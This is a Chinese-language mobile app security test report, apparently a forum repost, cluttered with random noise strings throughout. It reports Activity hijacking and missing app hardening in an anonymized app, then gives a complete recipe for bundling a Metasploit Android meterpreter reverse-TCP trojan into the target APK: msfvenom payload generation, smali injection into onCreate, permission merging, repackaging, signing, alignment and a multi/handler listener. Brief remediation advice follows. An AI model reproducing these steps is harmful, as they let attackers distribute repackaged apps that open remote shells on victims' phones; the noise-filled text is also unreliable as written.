0 y' y0 U& @4 g8 u' F$ F % ^1 L1 P8 _- A. g# X8 t' D) D5 E

5 c$ d7 ~! s: f' {2 L& t . n; M9 t$ Q- _6 R 1-2 测试结果 7 F) H' {* y+ F' n% U5 j( s. l 0 [4 o9 ^) ?/ G

) L8 M9 @( O0 ^/ e+ U6 r$ p- N' ?8 o1 q 2 B+ i4 m" {# q' x

9 r: @9 F+ M8 \ Z6 u- @' K7 Y % t# I5 K& u+ ~   + t( {3 l+ | ^% Y& z 5 ^# f8 \; F0 h& }( L, l

' f# ~* z6 H6 F3 B& R( j; x 2 j/ C) _! M: v; V

8 E3 N; j3 a, q) b7 z4 V5 l' x; r+ ?$ P/ M 2 检测结果                    ; f% A" q: f/ _; J8 |$ b! I# T0 Z ) V- L. j& M8 {+ C. ?+ h5 ^- ~

( c. c& s8 q C- u8 c- j$ ^7 z: m6 a , L" _3 e1 O" ]/ g$ ]6 n/ d: t

: S W$ q% T0 G: P % s& M; v" r6 O- {" S 2.1 某某某 9 `( p- q6 R( k8 A" |4 I {) R+ I* V G9 \3 M/ a# O9 q, X

$ E. q/ q5 ]9 U/ E" g$ g9 N% I7 | n" `$ @2 d' S% i& x

3 h, ]; s+ i# ]$ A' }7 L. P4 }# W5 `$ K* h) e: b$ N 2.1.1检测目标 : K! H( O3 _/ U + X i; u' d0 G2 X, y7 q

; @! [0 c9 f2 A! I! Z) ]2 K) ?: o3 E2 @

# j+ i( d3 B! z: d # V/ u# n* `1 Q; }% s. ~ 目标地址: 某某某某某某APP ' i# a; Z3 F( }( {' K5 f0 A! T- m - v$ H( ?; h. E2 n/ S- g4 ]

* i2 D/ e! M$ F& l) s- h, S1 Y. f; o+ n, Y+ @2 ~% U; u

. C6 d; m* a& ]7 r. r6 u" E% x 9 k0 L& \! b! Z, S 2.1.2检测结果 3 y1 r, o- k3 X! N! d) U" @ J9 E , [- h8 l6 K7 ~

1 v7 {! _" `- s 6 V- M8 I' \4 s. D

+ J* A ~- K7 m$ I! h" t Z* t' L3 q/ F. k 2.1.2.1 . d$ L: o# C3 J, Z+ ~ # ~) e5 x7 h* T X

* I5 H( J1 T- `: S' _! n$ O* p 7 _1 D. p# I5 N. N& I" i

4 D& w' P7 f. ~0 Y8 R4 S F ) M( }2 h' u! L& Y9 k1 x: \7 \ 漏洞链接地址:某某某某某某APP 0 Z0 D6 B5 f% ?- w# L7 }3 Z: t ) M* l) H I8 X- c

. n7 b" H0 W* n6 a( ?# ^% h+ D" c) q# V6 l- r% g' ~7 V9 t

& f, R) @' H; p' }8 b , K. R9 D8 @5 G   & g B, N/ S. Q* d9 h! | + y5 [- A6 x/ l! ^' I- ?! D5 f5 D

# H. t" Z" \8 l9 v 6 k" ~$ P% f3 n z! U9 }

* |# K5 P& G3 Y% o6 j1 T6 S - M1 n& }" d. D' C: R 漏洞分析及取证: 5 ~$ U8 u; @- ]2 U, c : O: D) u" l! V+ Y1 X6 x

1 H$ D$ w) d9 \, i, \- A9 z ( Y" B( {! }& O4 \5 Z

5 O0 f# H7 B+ F* O% H+ s 1 B* m4 O6 K9 [( N0 S! @                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: . X/ V) j0 ~1 t" E" O; v9 _% k3 N8 ^5 H6 p- b4 E

( C& w( N6 m0 E+ O# e" W8 _2 Z5 \2 G a2 W3 Y' A! ^# @) K: S/ K

& `$ R1 p& `" V Y; i9 X$ F 4 p: Q9 `% G* {( g9 u" j      ; X& e, j5 v& x, T6 q * r9 ^% S9 | U* o; w. ~$ M

# C3 u/ }6 H) ^. F7 }& Y8 m+ n # S! l) q$ U u0 S, }8 y+ A

+ u \( k0 s9 k7 @8 L$ V0 C0 W $ i8 x& a2 B+ _) R# l                       3 q1 X; A4 c2 Z/ b& N$ `, k& H, n % W/ o+ K& U8 a9 A

1 i$ L* G) q( _6 i9 ~5 T0 [$ m" J4 G- X+ M* D" O0 S" D- }; r0 Q; t

, X' P0 ^' g. T7 ?& v 6 p0 h+ C4 |% T( ]1 x- r3 ` & H# R+ B( F* W- p$ h2 I0 ?% ?. M S) c, H0 ~( t* V

7 {% E- a" x r- h+ v8 X$ ?& ^# G " ^: t2 {3 x0 {8 y4 j4 X ?

* `, m6 k5 [6 i* @# s 4 e: ]+ ]4 m& b# |5 d! y. A 9 _2 y+ B$ |7 l/ D V# |' h4 g1 G u/ X: L

1 c7 t5 ?$ j" C( ~" ` & e# K- n% F+ f

: g# }2 f r' w m7 U0 N2 B+ g" s: L& q - d: U: `/ M. z3 \ : c D: f6 w8 W# Z2 H/ ]

3 J, Z1 I3 U. z$ V8 ] , h' v7 r* V4 [& C! x% R; Q

/ ]! o7 h: R. H2 \- p : u8 t/ T. {. Z+ {5 P. s 漏洞危害:高 . }$ O0 r, f2 ?1 t9 j" o' r " p. l9 N. d7 c7 G$ `. M

6 D% i. n% j! g, M8 C! c ?; N5 J# n+ U& J
8 p: A: K) M/ \+ z o2 s$ G + X1 d8 ?/ W; p) d" b2 S . o( t9 N; c4 q& ]" l' N H- x9 P& R7 c( D v# z4 M' ]0 s3 _- L2 ]+ V( ~( l# M$ y) h( H5 D9 h5 t' l& W, A# a$ z( S0 J% [+ V) q* ^1 t/ [0 R9 V) d5 I$ N7 O: A% e- Z8 S+ R5 R) a) e* A6 ]" k d9 S) x) K4 H, u8 w0 ~- H) S) B5 o; p' h9 l; b. p: e5 h% c8 x$ r+ w2 |$ J. o( X& s2 \, Z- C: q+ @$ {- Y% L2 x$ n' f- D8 G( G& `! @1 d! J# q! S7 W v5 U, p' q* S" [ K% \4 O0 P3 E* e4 Q9 L5 D# T2 s; C0 s* v! s* |1 V: T4 E, d' N; R+ `. X/ t9 l7 z8 F# K8 i" L- K4 T4 {, W& I$ n8 i4 k3 w" F- H5 Q! \; x# h; D: T- W! r+ W; m9 B+ B! q7 f) [$ K L
7 x# T, N; E ?5 b9 ~; I$ m % E; l( O9 V0 ]; R; E* K) S$ `/ f

* C1 f# U$ g# ?( u2 H( g , f9 K* g. w' T 严重程度 9 G- S) F6 o3 k; D/ u' Q: p7 k% Q9 x

$ u0 r4 H! n- C4 F/ d% J' {4 i 7 ~& s" i8 K$ z6 n
2 [: Z A5 F1 y. T+ a/ \" Z# X5 W % J* Q( H# f8 b) Q" G; C; ?

- r8 u" \" G# A$ ?$ M* z% K , a/ |6 A+ x3 s3 `1 A( Y# _6 s- S : P0 J+ d6 w. D 1 T: h8 Z B. g9 k

/ w) a( {% g! i, e/ v+ `' v, B: x+ ?* Q+ c* v/ u& n' W
6 M$ C9 x9 ~; Y. S/ N # ~) h" n" D L* m% ?5 ]/ a/ q0 \

$ C1 y* i9 ^( Y( J. h/ u! W( G4 W2 U) F7 y . J$ x& R! n# ~, B , N" i/ o% a, D: `: p3 ^& x* A) e

0 @7 z0 |& g1 s7 q# M ' l. M* [' E$ a
1 \) C8 T5 v P( u) t- {- `+ e ! F2 k2 d/ @1 [+ r" Y2 p

; A- _3 H; K# \( _ b4 D* ], R. S$ \ 4 [+ N( L& N- X$ S* @/ Z3 Q% k x' O5 z8 o' z4 u

8 k, n$ g1 d! j& T/ Q4 W' ~' J( [4 F- J3 P7 @$ {# Q
' m8 I) K L- B& f/ x1 ^ % N4 d- g% h! i6 O, R5 f% w

! Q* U5 o! Z& \7 S & h/ H6 ?: D9 Z6 ]' F4 x5 t   0 K& D3 l7 X6 L& u+ b7 G6 i! E, f 9 }+ `1 p* D2 f, g& t

' o" F+ [9 j# h; v+ J1 F' ~ ; l6 C# D2 n; O; n4 X3 {
, _2 D$ i C4 v2 q' f$ o7 _ 3 y2 ~" T5 h4 V

7 Q; G, g# U6 h. g: T5 ~, _5 d6 y H7 I$ ] - D3 m4 w# g5 i+ p" X# C $ O: m b3 p5 G0 B

8 W" G3 n6 |1 P5 D7 d# V' t3 g, Q) N8 r+ @3 x9 x0 u q7 L
9 o& y$ m7 I& T/ w! f : o: C! F! G9 i

! M7 z8 ]( L5 g5 \0 E 3 L; @2 {! o" Q% u4 b   ! r$ S) @+ f. v( g* ]( H- z3 n2 v: s1 R6 n/ H

2 _ R- O. Y7 B* |5 T7 t # l8 S3 x& M: {5 s
) p7 U8 S$ a h( A # s4 X) H! L! v, Q1 j( I( D
/ Z( u5 j6 p) I6 Y3 W& M3 S5 ^% ~( u6 R+ w$ v M

, t) K. n: O$ s& f. |4 H/ t5 _; c( b, r" @6 F   5 l$ [0 |+ s' x( C0 A - t( @4 D# p$ ]8 I7 \4 D

* b5 [' {+ I! @/ _ 7 |0 t K+ g- g# h) f2 h. Y' K3 N( B

. m: M6 m$ B2 A2 k1 F9 U : r, @2 W4 z* r- t 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 5 e9 E: O$ q7 r6 o1 d" l: z : e( k/ O: p2 B/ k' a- _$ l$ s

3 Q3 z+ ]( o4 w+ {0 J p! b4 h( t+ `! Q9 E

0 i2 H7 B5 ~/ S( u7 K2 L : j4 ^# I9 N, }/ x1 w" f$ H5 s& `           % W; z; D; b, E% C 7 v6 j! q9 @! k3 n2 X

' m# B0 b# Z2 a, q& y ~8 c3 @7 N0 s0 ]

# i9 d2 R3 g1 X3 S6 _( S: a4 i; g* j- u2 E7 O. `& H   * l" ~1 J# U/ i; e3 X# W 8 f4 m5 _- J' V+ p

1 O9 t* [" ?7 H3 p8 W8 @( {1 h 9 t' u. W( Z, `8 h; ?' f

u2 _6 O' a; N ; @. R2 i$ n0 c- [0 \: C0 e/ A 2.1.2.2 7 y; H A1 |) z; x! |3 C) Z 4 `+ b2 Y4 B- g2 f: F

: f/ Q4 t# B! O* M5 { ( I. G/ }# v, D* s M# `- z+ r

8 l/ ^5 U- z2 b I 2 D5 r; |7 u1 N! @/ S 漏洞链接地址:某某某某某某APP 4 `6 O A$ f! E) S% J 4 Z+ |7 Q& r* q9 W

2 i+ p. X X5 A8 J x & Z) [ a1 ?6 I2 Y/ U# }# X

+ D6 ]9 r; J5 z" p 9 D* d: D, Y) P7 F 漏洞分析及取证: 9 F8 [6 A/ U, o / ]* _6 l' H$ U7 N" u

$ {# g2 [ S4 @ F, a! R) S5 M: |$ s8 r

' @: I2 j# X5 Q 7 ]8 f+ I. m$ b& x B                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ' r! r7 T% |2 } ; ?8 N- E4 z3 Z" H; W

1 Y# k. q4 {$ _" S5 c6 k* h# E# z. V G3 h* E, S& p

) \3 ]! P1 e6 i9 m ]" {0 j, \; D x0 J- `4 k Metasploit 生成木马 apk # e5 k. H5 R" }1 k+ K8 t' a E# ]/ l& l O* v% O

7 x, c1 }; N) |* ]4 O5 i' h( X ( c) \) ?! m b1 X* {! \/ w T

4 }) c+ r6 M- v& [+ H# _6 q& m6 W9 ~. W2 N3 I* A msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * j a' X0 y" Y9 _ 1 d8 U7 g' l1 a: W! k4 S' p8 G

* l; g' V, E; [% b. d$ n 1 q6 F$ _, m: m, L8 j

# i7 S, m: K$ g8 P, V- {4 g ; R6 V* m7 Y- f8 i1 S* t 反编译目标apk和木马apk / `6 {; N0 o2 v4 Q2 i . K- g# d: o% d. Y9 Z' u" m

5 P; v' G. N( K' D4 b* I J / @* f" `9 W6 n0 r

; L( q* ~: B1 E( J( n- F. H . C" ?7 Y# ]) k% Q O" z" K | apktool d target.apk
/ ]$ w/ M' T/ O4 ]5 \* [8 @ $ I4 u1 r+ X9 a9 }! {7 L apktool d cockhorse.apk
) Q! ^3 F4 @, e0 B 5 {' r9 |, x( p, M# V! E2 x1 w0 G

, M# c5 L: ]6 d3 F l8 e7 b / w5 C/ ]' G) S4 x9 x

$ \3 f! S( g- w" {: c8 k ) ?) s1 @# N8 u3 L; p' I 木马 apk 注入目标 apk " q3 q. L: ?/ z, z4 V4 v ' s' E" ?0 T! M! B! l7 J% R/ L

, z$ A- H5 J" K& A% x; T' p( s 5 R9 n0 N, y7 G5 w

5 @, u+ {4 {: y' ?* J: B" t. v8 G( _# |/ d 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
( U, |* m! S# m, { % B# ?' i; R8 H invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
7 m4 m2 \$ d4 R/ F! p0 a1 E 5 o! P1 a" a. ^$ `2 V

; x8 M3 X+ f+ X 7 t; Y5 K3 s. S: m

. I( l; e) z! W8 M2 a: U7 [8 |) x* T* d |) r: \9 D- d 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 E8 {, y/ \8 X4 E $ R% @9 ^% P& t5 I+ C4 G y

1 F7 @' y3 c: E- w, B' e1 G- r & S# L" O( {% R1 t" L7 D

# O4 C$ M5 b4 J! s9 l- Y: R3 i8 _! d4 ]$ Q7 @5 } 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ & A! z( K) f+ W: c5 o4 z7 k # g- y2 T0 e9 l% Q+ r% T

/ N7 e3 S( Q* V5 y6 a0 [ v/ s* _; S* a: |( N5 |! L4 a

9 i" m0 a' ?7 _. E# I 2 F4 X' O0 l: ]( e3 e9 M 回编译生成最终 apk / i, X: h0 \/ h0 ^5 `) N0 _ # e; h8 K x9 S" H8 Z

' B5 n! J. g" F/ q' z5 n9 T; u/ e. a" I/ Y7 f' t

! {- f0 q$ ]/ } i ) t+ @! G: O) E* t8 `$ @2 {% c( G; j 重新打包 1 n' P6 x6 B- v( F# U4 ?) O ) ~2 h! J X, M! b8 c: K, s

5 J6 a& {4 H% \1 X" S, D+ z& v& _' n; G

) J1 b" D3 U8 u" ] 3 r% Z" j% ?. I apktool b -o repackage.apk target_app_floder - l, B: Z( f* h' B- I+ F2 ~+ f* C" c, L i7 Z* S# ]- U5 @7 v: G

+ Z: n0 J! C% c* p+ j9 g; x% q+ X 2 y* V8 r: p9 `) `! K+ V

B, q) k& z: `: n0 p5 g; s3 Y1 ~. k% z$ W- `8 S _ 创建签名文件,有的话可忽略此步骤 1 @, ^# S$ F) ~, ~ g3 r" x, h, L/ N+ y) U. A$ h

" ~/ L, J7 O& T' d. b7 g. C w2 T) U/ P- a* W- m+ v) o

2 u' g7 R& `6 j! k/ e - [1 D1 X0 z" C6 M+ T9 v keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                4 o( L. |1 E, @' s' V# M 2 a2 R T* A0 `8 ~

: R8 h0 ]% G m( a$ w& D6 h 0 q" w: \1 }( n, r. C* {% i

( k- P, d% n! S+ h / R. b/ h- }0 S 签名,以下任选其一 2 K% k% j4 A+ o$ j: }: K4 M4 ^& x F9 a; O1 R$ {( w

! I& q3 m% U1 ~; ^( | 1 e0 b' [ r' }: r2 C/ s; u4 P

* E/ W& {" M2 i5 U: u9 L9 r2 z# c- b jarsigner 方式 & w$ q5 p+ G9 u+ N' E7 W% V4 }6 f % l. A! U8 K" w( k' W

; L; t9 n+ D6 n. ?$ z; d 3 u( U4 w, L6 f2 R- H, O

" ~6 ]1 N, _" i . k6 ~5 I5 Q/ y7 o6 v+ l jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 C, O; n0 g: D+ P7 Z5 A/ f4 T- I3 J1 f) W3 i; I

+ A7 z) I' h7 z2 q2 F5 s ^/ ?5 B , ~1 T1 R( @% P+ }

7 w( _2 v7 v8 y ; [4 a- n( Z" V1 A4 J apksigner 方式 % E% k9 v! X+ ]9 X! C# P& p. J- R( a3 d6 m" E; j

# d. D) B& R' f( b, n$ Y' K 2 m" H E. B- _1 K; Y

: Z& w* `2 [: [, b' P % a/ _5 ]3 o8 ]' e apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk " g" W* @7 y7 Y3 F' Z( {- U! h4 ?& i' W$ T9 z

) f4 Z7 ~2 j1 A2 Q' | 8 @! E4 r2 @. w1 w% ?* |

0 n$ A7 P I: @# r# c) y: H! Z7 `# K9 j) ^* ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false % g+ L/ _1 S. R' V3 u U6 `9 K7 Y& ]) B$ f2 y |

7 }" e9 e4 [: H* d! b% L, y # p. Z9 x, B/ n- t7 a& R* }

{# i) V6 v# F: t5 ] 6 Z. Q* w# u$ \& {# a8 F" X& l 验证,以下任选其一 , |+ S, G* x" g! w' ~4 ~, s1 ? 2 v$ R$ h5 u) E* R% k+ j; ?! u

- q+ d7 }0 d% S' F: m t+ A( Z. `9 t: ^. o

9 |! t( N& t' c/ O' ~" r p% f& K. T! J! g+ w; Q jarsigner方式 : ?2 r% C% U& P5 o0 l # A6 F% M/ {* ]3 ]

+ t: Q; f3 B" E- M4 S 2 ]5 B/ [- C. i3 h4 g- D+ p: T& w

2 \' m9 M# N J9 X 9 N x a Z$ V$ `3 Q jarsigner -verify repackaged.apk - I6 | f h8 h3 O0 D 0 u7 {$ y& M8 Y! ^$ Z

% \1 T3 r e, I, c& S2 n0 O2 `9 n$ e+ ?5 j# ?5 y" ]9 @6 }/ X- L

9 w/ S) O4 y- [3 g# x0 a% ~. j' O# J- Y o% ] apksigner 方式 5 _7 x/ S5 d. _- x% H 8 @! G2 x% E1 k7 f

3 T1 I6 Q% ]2 q( u6 P5 O 3 p5 h; V: ^+ i# ]

, F1 Y! Z' z) P) O : V s# c9 q& D apksigner verify -v --print-certs repackaged.apk ( U( S6 p6 N. ?' L- | / E+ v, s0 N( Y- n6 |, g! F& n

* J7 N# T- v1 h& Q( o% } 2 j/ ]$ V4 w! h/ s

) b; D! Z' a6 Z8 m8 s1 A3 Z: q8 `+ C4 G keytool方式 4 P+ R. B) k# S( A. ] 8 }, B3 i! ?; F

& g* [# Y, G- m8 q* p/ I% d) o- K0 `3 ~, F3 d2 T" z( R; n

6 R, U2 K' W9 [% t5 V8 m , A% d8 F. I" T/ V% X keytool -printcert -jarfile repackaged.apk . P- F8 U' M9 G' g! E6 l ' G5 o3 F: m( ]! z5 z: v7 E

: ]/ a9 p+ Q% A % A3 i3 k4 u |! U4 A, K! `

2 K8 k: \) D+ h2 V6 Q" d$ d $ R% B. ^1 k! K$ o0 n- w9 W 对齐 - m# U& i+ x9 K5 i 6 j% M% R% t$ r' m: O

% s2 ~% i. F# B( m% y$ V3 }# {* N3 I5 _6 @6 r

9 C }* h7 T* Z# g. k% V3 @6 f' D3 F3 n& n 字节对齐优化 9 E; h5 W5 ^' g: j; h ) J% [( } R5 \! d2 m

1 N7 q: q! l E- [% k* { S % I7 |2 \+ X. ?% f

) s6 ?9 A2 i* b( m7 q" V c* e5 y1 b5 D 4 j# w3 e, x B, V% u* _6 g zipalign -v 4 repackaged.apk final.apk 2 ?8 S! @9 p. T4 U ) ?7 x: S0 V3 e2 `- H1 d+ d

- T! u$ H* R/ f- H! ^& } % @3 m& @9 o- G" U2 `

: g) L- v R% l 2 h) i4 v: b; p' j( u: J 检查是否对齐 6 l2 `- V/ P5 M$ t/ O/ T- l4 g ; w' ?% ^4 M9 d% t1 ~

# {$ C/ c2 M( e7 l# |6 X+ G 7 K" H/ i( J2 p- f

8 ?2 w" i* \* [ 7 S7 Y# O0 ^! d7 F+ C zipalign -c -v 4 final.apk 8 k/ U1 c n4 I! {3 `5 H9 w4 }# v' ?" i6 J4 q

( M# s+ J/ `0 l8 ` ' z0 P3 i' {" l( t; l4 A) t

6 S: L* H( [, u8 h# d, B' l$ l! I N0 |" j0 T; f9 q J! H 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 {4 S2 e' v, q! i0 D# ^0 e 3 U5 W6 t2 L* K7 E) g/ [

" I$ \, P& }: i' A2 f' Z5 r4 j, \0 P/ e% D

1 E9 x! S! }# Z5 Q5 j, O3 E( F0 L% [% u, g$ I0 N1 s+ d' } 启动Metasploit控制台,配置参数等待上线 $ Y6 H& D; W3 O6 } 9 I6 n. X0 _' H9 @- m

' v# L' H/ I9 n G6 m' {3 Z3 ^( g8 o4 E

0 \, E) d9 m2 {/ O7 G1 ~ g! g+ v0 q & k6 b5 K! E6 P, N 在终端依次输入如下命令 % x$ o3 x% ]3 ~) e; U* m . n. R9 N, r3 r" |; l8 l

; F5 c0 ]* F; S* n7 n1 s% }6 y * e& s/ y4 ?7 H3 G C% M9 E& m

0 N! W4 m/ R( y+ r ) i! j& O* s- E msfconsole V* o6 L4 l3 S , @# X+ S T2 B

+ L6 c6 u. Q l: h) n8 x, G. J( }. |6 G$ a

2 T+ R# L' W9 Q) m8 Q" u4 F ( ~, h; W1 e9 Z use exploit/multi/handler $ |9 A$ \: ^% d) W& z+ U% @! v $ g* B" ~; \0 j2 q

S% [3 D5 j. M8 m z8 O: B2 ~( _' @5 N0 f- e5 a" `9 c1 y

7 i: N" R+ h! Q6 C" d) I. J" ` , B- h: \! x' f set PAYLOAD android/meterpreter/reverse_tcp - ~2 E" Y% B$ R% {. a ' E7 c# `! D0 k/ ]8 z% u F

% o6 S7 r; w) U1 J( ^$ f& B N! ]' e4 G2 ~- f3 I

) s+ p+ G. f6 R ( h! ?' x7 B5 s7 N, \ set LHOST 192.xxx.xx.xx 9 @( H+ U0 s1 Z, F) p5 u, I$ Q 0 ^& [3 }9 o% P6 H/ b: M2 r3 F, f

1 t0 _& b# t! Y, ^8 p+ M, ^1 J7 S # S/ l/ K- z( w' v3 [9 g x

. h7 X; S) L8 j: ]) H % u) Z. M; J9 S5 \6 a: ` set LPORT 4444 ) l2 a2 ~4 |0 _6 S: M' [ * r9 d- L7 E' Z* u- O# a! V

P) I* K: D5 L Q/ I , l+ s4 j' g" a8 z9 o7 V: K

" T6 ]* B6 w! W! r* Q , P b2 ]7 z" U- N4 ~. j exploit ; M- j0 `- U! `" P2 A4 ?3 w; S! B j1 c( z& f0 d: j1 c, Q6 ~

! |. T% V ]2 T4 o) X - n' `: b H0 \; ~1 _

7 X& E2 u/ w( R6 h5 N8 d1 K : I" Y( G' j0 H" r! h! L0 H8 D 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               7 Y/ W/ |" w0 { 4 G$ c0 j- @8 R9 W1 h( g/ V8 v

1 J7 l1 E$ Y4 }( s* i! Z # q% T# K* f0 l5 `

6 P4 i: K- X$ o# t5 { 8 W% d* d& l6 L6 V6 K6 A 漏洞危害:中 " F* C, {8 m4 m1 L }% P) h3 }; N1 f 1 N! V$ y7 l( n& C ?8 Z

* }4 [2 O; x* P * w4 j1 [! T; C: G2 x
( R, E, r6 Y% Z7 p4 n, z3 ~* A5 w# Q7 Q% y$ J# n1 ~- |9 s1 Y ; T8 M/ b; P: u3 \6 }- H/ C6 d( [/ S / ^$ e. }0 S! t0 ~. q$ r3 e ( k& \, Q/ E/ l6 f# Q$ ?$ M3 C; q% h1 A" Z9 V$ h1 C/ x" [! A! d( O$ y% H" p( ?$ @( p7 ]) D' P% q5 s5 s. M0 ^/ E% P# L6 b# C. \9 `4 j- h5 Y4 \* R v5 c' ?- ], t5 U: W" H( D/ p" w& n4 M8 n1 @: R; |% e* }9 M6 ~, u7 |% {: C4 ^/ E) g' c7 n/ ?8 F: D% n$ H% d1 K6 l& f& l$ h0 n/ Y$ m0 N& z' }+ s: s( b. h" V) q0 v O7 l$ O. V ~# v. O# s/ v- u; [$ y R x) K+ C# p3 N1 ]" w- [; q$ V0 U1 F; M- M1 N9 G" p2 O; P: R. b8 y9 [; _: p7 ^1 u$ `0 Q, |( R! n3 s; u' J- {- L3 Y% D! v6 t7 p1 I9 U( R4 K1 |7 }/ e/ ^3 e5 \3 [- S+ _( Q* `) n$ F1 Y" v9 q# ^1 `$ {8 T( d: y2 H7 c5 _8 ]- X x- f3 I7 F1 M; K& q+ Q1 o4 T: T/ l9 _% r9 U S! D
* m; Z- I( z; [4 ]/ Z4 L2 k& |+ D; l f4 o# s

& S4 ~7 C5 ]2 I% S" k 5 A R( s/ a; g; z. n 严重程度 0 V7 w, d+ h! R; n7 X - _- B& E7 L: B$ `

8 j3 S1 T6 T5 k$ A' r' p' i% Q* {/ d" B2 n( C2 x
6 F+ y" O/ c( ~* f8 b$ c 4 w( W% V% v! I9 m* t

; f! I% E, N: K* A 9 d: u5 v9 p _1 D0 M # ?; Y) |# L H0 c2 @( X 5 I- A& A1 E. y& x! L

2 a* m/ k3 C8 m1 S. |1 S, L$ Z$ m0 W+ s/ |. c" i
* X$ a' g+ w; c" Z, Z$ I$ @" M3 Z; |( D. z- K, |- g

8 G( i8 a' [+ f/ h1 l$ F. q 4 t$ _6 f9 k( |" J" t 6 R7 f: a: c1 g7 c6 n4 s2 ^+ D- \' } . [+ A4 X1 ^3 |/ A/ f$ H5 T

4 U Q' O% G% _2 t) A5 G- b& W1 v+ Z ~, S4 o
2 N7 j1 D! r& ^4 o P 0 H0 I3 r/ L0 F# P* m

/ f, v3 t9 f# M: C i ) f7 g+ U* D7 H' g* l 7 z( I0 G4 |% @' a ' q i9 h# J- q7 z* a7 K+ s$ `

* T: o2 `, t9 n8 p! k$ ] : U4 J% M) {7 D* c: B# [8 _
) q2 `3 g; o/ ^' Q5 O2 y2 ^1 | 1 I! o$ X! n/ P, M ( t w0 J3 d' \6 b% @0 S ' n" R' j- f1 \2 q0 Y

! o- t. d* D- j1 S& [/ v E # }6 G M0 s0 T0 D' r; d   1 U+ F! W3 r# K8 n: G# f ) O; U' V) ]% U) z: Q

@$ i* c0 P. u/ T, W' W- R 6 K- v- {( @) v) p" l- O8 p T
# i& t" P* E, P4 i1 [; K; R1 o* W4 n' a& [; h8 P6 T. a

: k% o+ {4 I9 C+ ^% w/ v& M( h& B) k: V* f 7 I/ t! l/ G1 S# _% n 8 p8 F( P# S* D' ~ g4 Z

1 t4 V# @# ?% a3 U% [& _; b , E: Q2 Q7 x: Y% ?9 g
' e6 M2 f5 l" N9 L3 Q$ c6 p 0 V6 }- j% D) c4 D# h* C8 b0 Y - p% A3 u4 S; x) P $ n0 K' K6 a+ Y

" o' k0 y7 F3 b7 a; O6 O 6 |& o2 G+ p( W   $ a5 h* F- l* n' G8 A7 p / R1 J+ u6 [6 \' B( _+ F

* E% [3 k6 W5 @- R. M3 u9 a 3 a. [3 P0 R, W. k% A
# D1 w2 g' Y+ Z7 E8 e. { 2 W2 u! b* o( j: k7 r3 S u9 q% N O
) V& e2 t" a& i/ ~# R) ?) q: P! Q/ c0 N( Q

. `/ ^2 K8 h( v3 L" D8 b1 I `" U9 G3 D   ! \. T8 n+ x' Y# L3 Q8 q' c* e" i/ A# O6 y0 U) H/ j

: V: G, [- f5 m4 F # z) D2 ^/ _& w! o( Q

8 H3 h, Z' R6 N. |3 X3 j- M . y% N$ b6 p2 ^4 |) f, r/ ^ 修复方法: 3 c; s" l! L' r1 w5 ~2 \+ E# f, e# k h: V0 m+ m5 T5 C+ W8 R

. G9 X" x3 G+ B" _% r3 c/ y9 z; n" F" t0 \/ q/ k. o

) U M) I5 c, P% {+ @! K# ]8 k; G0 R6 Z0 K0 O! P               1. APP 启动时应做签名校验防止二次打包。
4 k/ }- F) A _9 s( k- e + @. O. B" T4 G) @7 m 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 8 ?' c- w( |" R6 `3 T) O* z; ]# e5 F. s8 }4 C3 L

8 f3 B& T5 H' T 5 o, w( M: N+ q6 L8 _" V6 B 3 l/ t- l. ^1 T6 G. P' u- ?5 u) Q, E7 ]- b+ p, K

r6 H, [ L7 _; c9 W- [: G! h0 m. w4 w   9 D5 p& x* |; c a - x( M8 M4 O3 `5 D% l }

! G4 ^; u( J7 b: K3 X# S* m! W/ a" [+ P$ X& s ' ~5 X! H f% |* p2 l 3 S" Y7 w' q+ c) A L3 z4 D

4 B; U" {! q, ^5 d7 l. k ! R6 X6 A, T: T T2 G7 z+ K+ z' l
% U2 Q% f( _5 j3 ?5 I7 g: g$ ]7 z8 g . ~: J% v, Z K

/ w0 ^2 }9 R* F- a" S$ X _# W1 |/ @ ; m, r' q7 X2 T6 O4 ? x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表